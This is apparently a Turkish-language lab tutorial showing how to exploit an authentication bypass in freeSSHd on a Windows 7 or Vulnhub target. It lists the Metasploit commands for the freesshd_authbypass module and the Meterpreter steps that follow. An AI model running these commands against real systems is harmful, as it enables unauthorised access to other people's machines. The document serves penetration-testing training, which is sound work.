Yazıda özel olarak hazırlanmış bir Windows 7 bilgisayar kullanılmıştır. Bunun yerine hazır sanal makineler de kullanılabilir. Örneğin, /dev/random: scream sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/devrandom-scream,47/
freeSSHd uygulaması, güvenilir veri transferi amacıyla kullanılan bir uygulamadır. Bu uygulamadaki anahtar değişimi algoritmasından kaynaklı bellek taşması zafiyeti MSF freesshd_authbypass istismar modülü ile kötüye kullanılarak işletim sistemine Meterpreter bağlantısı elde edilebilir. Eğer kullanıcı adı kolay ve tahmin edilebilir bir şekilde bırakılırsa, parolaya ihtyaç duyulmadan kimlik doğrulaması sağlanır.
Metasploit üzerinde ilgili modülün seçenekleri aşağıdaki gibidir:
search freesshd
use exploit/windows/ssh/freesshd_authbypass
show options
Seçenek olarak hedef IP adresinin ayarlanması yeterlidir.
set RHOST 10.3.0.142
show options
Seçenekler ayarlandıktan sonra modül çalıştırılabilir. Modül çalıştırıldığında uygulamayı çalıştıran kullanıcı haklarıyla Meterpreter bağlantısının elde edildiği görülmektedir.
exploit
getuid
getpid
ps -u Yonetici
Benzer olarak TFTP üzerinden de istismar gerçekleştirilebilirdi.
Kaynak:
http://paulsec.github.io/blog/2014/04/16/scream-write-up/
https://www.youtube.com/watch?v=aJktFdwhixY